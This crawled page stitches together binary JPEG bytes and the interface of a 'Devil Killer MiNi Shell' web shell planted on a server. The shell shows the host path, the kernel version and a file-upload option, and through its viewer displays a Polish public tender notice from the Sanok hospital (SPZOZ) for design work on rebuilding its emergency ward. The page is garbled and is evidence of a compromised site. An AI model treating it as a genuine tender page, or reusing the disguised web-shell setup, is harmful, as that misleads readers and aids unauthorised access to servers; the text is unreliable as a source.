JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240412/0028298901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej w ramach zadania inwestycyjnego „Modernizacja, przebudowa i doposażenie SOR SPZOZ w Sanoku oraz pracowni diagnostycznych współpracujących z SOR” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZESPÓŁ OPIEKI ZDROWOTNEJ W SANOKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370444345</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 800-lecia 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sanok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134656290</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.pub@zozsanok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozsanok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej w ramach zadania inwestycyjnego „Modernizacja, przebudowa i doposażenie SOR SPZOZ w Sanoku oraz pracowni diagnostycznych współpracujących z SOR” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a8535404-f7f7-11ee-8d01-6607a228ef1b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00282989</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00017765/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 wykonanie projektu budowlanego w ramach zadana „Modernizacja, przebudowa i doposażenie Szpitalnego Oddziału Ratunkowego SPZOZ w Sanoku oraz pracowni diagnostycznych współpracujących z SOR”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a8535404-f7f7-11ee-8d01-6607a228ef1b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej w szczególności przekazywania wezwań i zawiadomień, zadawania pytań i udzielanie odpowiedzi wyjaśnień treści oferty i rażąco niskiej ceny.<br/>adres e-mail: zam.pub@zozsanok.pl( nie dotyczy składania ofert).<br/>natomiast do elektronicznego składania ofert służy strona internetowa https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie interne-towej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego<br/>zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>Sposób sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz. 2452)<br/>oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy e-zamówienia wynosi 150 Mb Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia (https://ezamowienia.gov.pl/pl/regulamin/<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej w szczególności przekazywania wezwań i zawiadomień, zadawania pytań i udzielanie odpowiedzi wyjaśnień treści oferty i rażąco niskiej ceny.<br/>adres e-mail: zam.pub@zozsanok.pl( nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia oOchronie Danych (RODO)<br/>informujemy, że:1) administratorem Państwa danych osobowych jest<br/>Samodzielnego Publicznego Zespół Opieki Zdrowotnej w Sanoku, adres: ul. 800-lecia 26, 38-500Sanok2) administrator wyznaczył<br/>Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować w sprawach przetwarzania Państwa danych osobowych za<br/>pośrednictwem poczty elektronicznej: rodo@zozsanok.pl;3) administrator będzie przetwarzał Państwa dane osobowe<br/>napodstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzonym postępowaniem o udzielenie zamówienia publicznego;4)<br/>dane osobowe mogą być udostępnione innym uprawnionym podmiotom,na podstawie przepisów prawa, a także podmiotom, z<br/>którymi administrator zawarł umowę w związku<br/>zrealizacją usług na rzecz administratora (np. kancelarią prawną, dostawcą<br/>oprogramowania,zewnętrznym audytorem, zleceniobiorcą świadczącym usługę z zakresu ochrony danych osobowych). Odbiorcami<br/>Pani/Pana danych osobowych mogą osoby lub podmioty upoważnione na podstawie przepisów obowiązującego prawa. Odbiorcami<br/>danych będą również<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp;5)administrator nie zamierza<br/>przekazywać Państwa danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej;6)mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie<br/>administratora.Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:1) Państwa dane<br/>osobowe będą przetwarzane przez okres wskazany w ustawie Pzp albo w przypadku za-mówień realizowanych w ramach projektów<br/>(np.współfinansowanych ze środków Unii Europejskiej) przez okres<br/>wskazany w wytycznych w zakresie kwalifikowalności wydatków;2) przysługuje Państwu prawo dostępu do treści swoich danych, ich<br/>sprostowania lub ograniczenia przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego;3) podanie danych<br/>osobowych jest dobrowolne, jednakże<br/>niezbędne do realizacji ww.celu. Konsekwencje niepodania danych określa ustawa Pzp;4) administrator nie podejmuje decyzji w<br/>sposób zautomatyzowany w oparciu o Państwa dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPZOZ/TP/08/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 109756,10 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiot zamówienia:<br/>Wykonanie projektu budowlanego dla zadania:<br/>Przebudowa Szpitalnego Oddziału Ratunkowego SPZOZ w Sanoku i jego rozbudowa o wiatę dla karetek wraz z rozbiórką istniejących garaży <br/>w ramach zadania:<br/>„Modernizacja, przebudowa i doposażenie Szpitalnego Oddziału Ratunkowego SPZOZ w Sanoku oraz pracowni diagnostycznych współpracujących z SOR” <br/><br/>zgodnie Art. 34 ust.3 Prawa Budowlanego<br/><br/>I.	Projekt budowlany powinien zawierać:<br/>1) projekt zagospodarowania działki lub terenu sporządzony na aktualnej mapie do celów projektowych lub jej kopii, obejmujący:<br/>a) określenie granic działki lub terenu,<br/>b) usytuowanie, obrys i układy istniejących i projektowanych obiektów budowlanych, w tym sieci uzbrojenia terenu oraz urządzeń budowlanych sytuowanych poza obiektem budowlanym,<br/>c) sposób odprowadzania lub oczyszczania ścieków,<br/>d) układ komunikacyjny i układ zieleni, ze wskazaniem charakterystycznych elementów, wymiarów, rzędnych i wzajemnych odległości obiektów, w nawiązaniu do istniejącej i projektowanej zabudowy terenów sąsiednich,<br/>e) informację o obszarze oddziaływania obiektu;<br/><br/>2) projekt architektoniczno-budowlany obejmujący:<br/>a) układ przestrzenny oraz formę architektoniczną istniejących i projektowanych obiektów budowlanych,<br/>b) zamierzony sposób użytkowania obiektów budowlanych, w tym liczbę projektowanych do wydzielenia lokali z wyszczególnieniem lokali mieszkalnych,<br/>c) charakterystyczne parametry techniczne obiektów budowlanych,<br/>d) opinię geotechniczną oraz informację o sposobie posadowienia obiektu budowlanego,<br/>e) projektowane rozwiązania materiałowe i techniczne mające wpływ na otoczenie, w tym środowisko,<br/>f) charakterystykę ekologiczną,<br/>g) informację o wyposażeniu technicznym budynku, w tym projektowanym źródle lub źródłach ciepła do ogrzewania i przygotowania ciepłej wody użytkowej,<br/>h) opis dostępności dla osób niepełnosprawnych, o których mowa w art. 1 Konwencji o prawach osób niepełnosprawnych sporządzonej w Nowym Jorku dnia 13 grudnia 2006 r., w tym osób starszych – w przypadku obiektów budowlanych o których mowa w art. 5 ust. 1 pkt 4 ustawy Prawo budowlane<br/>i) informację o minimalnym udziale lokali mieszkalnych, o których mowa w art. 5 ust. 1 pkt 4a ustawy Prawo budowlane – w przypadku budynków mieszkalnych wielorodzinnych,<br/>j) postanowienie udzielające zgody na odstępstwo, o którym mowa w art. 9 ustawy Prawo budowlane , jeżeli zostało wydane;<br/>k) opinie, uzgodnienia, pozwolenia i inne dokumenty, o których mowa w art. 33 ust. 2 pkt 1 ustawy Prawo budowlane a w szczególności wykonanie ekspertyza techniczna stanu obiektu istniejącego o której mowa w § 206 ust. 1 i ust. 2 Warunków technicznych<br/>l) wykonania badań geotechnicznych<br/><br/>3) projekt techniczny obejmujący:<br/>a) projektowane rozwiązania konstrukcyjne obiektu wraz z wynikami obliczeń statyczno-wytrzymałościowych,<br/>b) charakterystykę energetyczną – w przypadku budynków,<br/>c) projektowane niezbędne rozwiązania techniczne oraz materiałowe,<br/>d) w zależności od potrzeb – dokumentację geologiczno-inżynierską lub geotechniczne warunki posadowienia obiektów budowlanych,<br/>e) inne opracowania projektowe;<br/>4) w zależności od potrzeb – w przypadku drogi krajowej lub wojewódzkiej – oświadczenie właściwego zarządcy drogi o możliwości połączenia działki z drogą, zgodnie z przepisami o drogach publicznych;<br/>5) opinie, uzgodnienia, pozwolenia i inne dokumenty, o których mowa w art. 33 ust. 2 pkt 1 ustawy Prawo budowlane<br/><br/>II.	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do:<br/>1.	Wykonania przedmiarów robót z podziałem (bez rozbiórki istniejących garaży dla karetek, budowy nowej wiaty dla karetek i robót zewnętrznych) na branże budowlaną, sanitarną i elektryczną - w wersji papierowej w 4 egzemplarzach i na płycie CD w formatach .pdf, .ath, <br/>2.	wykonania kosztorysów inwestorskich (bez rozbiórki istniejących garaży dla karetek, budowy nowej wiaty dla karetek i robót zewnętrznych) z podziałem na branże budowlaną, sanitarną i elektryczną - w wersji papierowej w 4 egzemplarzach i na płycie CD w formatach .pdf, .ath, <br/>3.	Wykonania STWiOR dla każdej branży: budowlanej, sanitarnej i elektrycznej - w wersji papierowej w 4 egzemplarzach i na płycie CD w formatach .pdf, .doc., <br/>4.	Wykonania projektu budowlanego (w tym projektu zagospodarowania działki lub terenu, projektu ar-chitektoniczno-budowlanego i projektu technicznego z niezbędnymi załącznikami), zgodnie z wymo-gami Zamawiającego określonymi w dokumentacji postępowania, w szczególności w projekcie kon-cepcyjnym oraz w opisie przedmiotu zamówienia, jak również zgodnie z powszechnie obowiązujący-mi przepisami - w wersji papierowej w 4 egzemplarzach i na płycie CD w formatach .pdf, .doc, .dwg, <br/>5.	Wykonania przedmiarów robót z podziałem na branże budowlaną, sanitarną i elektryczną - w wersji papierowej w 4 egzemplarzach i na płycie CD w formatach .pdf, .doc, .ath (dla rozbiórki istniejących garaży dla karetek, budowy nowej wiaty dla karetek i robót zewnętrznych, tak by możliwa była odrębna wycena tych robót), <br/>6.	Wykonania kosztorysów inwestorskich z podziałem na branże budowlaną, sanitarną i elektryczną - w wersji papierowej w 4 egzemplarzach i na płycie CD w formatach .pdf, .doc, .ath (dla rozbiórki ist-niejących garaży dla karetek, budowy nowej wiaty dla karetek i robót zewnętrznych, tak by możliwa była odrębna wycena tych robót).<br/>7.	Przygotowania i złożenia w imieniu Zamawiającego wniosków o pozwolenie na rozbiórkę i na budo-wę (dotyczących wyburzenia istniejących garaży dla karetek i budowy wiaty dla karetek) wraz z wszystkimi niezbędnymi załącznikami i złożenie ich w imieniu Zamawiającego właściwym organom, jak również wsparcie Zamawiającego w przypadku konieczności uzupełnienia wniosku lub przedłoże-nia dodatkowych dokumentów, w terminach określonych przez te organy, <br/><br/>III.	Inne ustalenia <br/>1.	Wykonawca przy realizacji zamówienia winien opierać się na projekcie koncepcyjnym opracowanym przez Zamawiającego. Rozwiązania ujęte w Koncepcji mogą być modyfikowane podczas wykonywania projektu budowlanego za zgodą Zamawiającego. <br/>2.	Szczegółowy opis, zakres i wielkość przedmiotu zamówienia oraz warunki realizacji zamówienia zostały zawarte w Załączniku nr 2b KONCEPCJA PRZEBUDOWY SOR oraz wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>3.Podane przez Zamawiającego ewentualne nazwy (znaki towarowe) mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanie ofert równoważnych w zakresie sporządzonego opisu przedmiotu zamówienia.<br/><br/>4.	Oznacza to, że parametry techniczne tak wskazanych produktów, określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu umowy. Ponadto, w każdym przypadku stwierdzenie, że opis czy też cecha opisanego produktu, która może wskazywać na źródło pochodzenia lub producenta to Wykonawca również jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne jakościowe, użytkowe i estetyczne nie gorsze od tych wskazanych w SWZ i/lub w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">9.	Kryteria (w %) i ich opis: <br/>LP. KRYTERIUM WAGA KRYTERIUM<br/>1.	Oferowana cena 60 %<br/>2.	Termin wykonania zamówienia 40 %<br/> R a z e m: <br/> 100 %<br/><br/>Sposób obliczania wartości punktowej poszczególnych kryteriów :<br/>a) cena: Cena musi być określona w złotych polskich. W cenę ofert muszą być wliczone wszystkie koszty związane z realizacją umowy, jakie ma pokryć Zamawiający pod rygorem niemożności domagania się ich od Zamawiającego.<br/>Oferta proponująca cenę najniższą otrzyma maksymalną liczbę punktów. Oferty proponujące ceny wyższe otrzymają proporcjonalnie mniej punktów.<br/>Cena będzie podliczana według następującego wzoru:<br/>P= Cena najniższa x kryterium<br/> Cena badana<br/><br/>Maksymalna ilość możliwych do uzyskania punktów: 60 punktów<br/><br/>b) termin wykonania - usługi: Kryterium to będzie oceniane na podstawie oświadczenia oferenta o terminie wykonania usługi od udzielenia zamówienia zgodnie -podpisania z Wykonawcą umowy. Maksymalny termin wykonania- usługi –Zamawiający ustalił na 4 miesiące, termin należy podać w miesiącach Termin oceniany będzie w następujący sposób.<br/>do 4 miesięcy 10 pkt<br/>do 3 miesięcy 20 pkt<br/>do 2 miesięcy 30 pkt<br/>do 1 miesiąca 40 pkt<br/><br/>Maksymalna ilość możliwych do uzyskania punktów za termin podjęcia interwencji w przypadku błędu krytycznego: 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania- zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że w ciągu ostatnich 3 lat przed upływem terminu składania ofert lub w okresie działalności – jeżeli jest krótszy niż 3 lata zrealizował zamówienie polegające na opracowaniu co najmniej jednej usług wielobranżowych dokumentacji projektowo-kosztorysowej (na rzecz jednego zleceniodawcy), o wartości nie mniejszej niż 60 000,00 zł 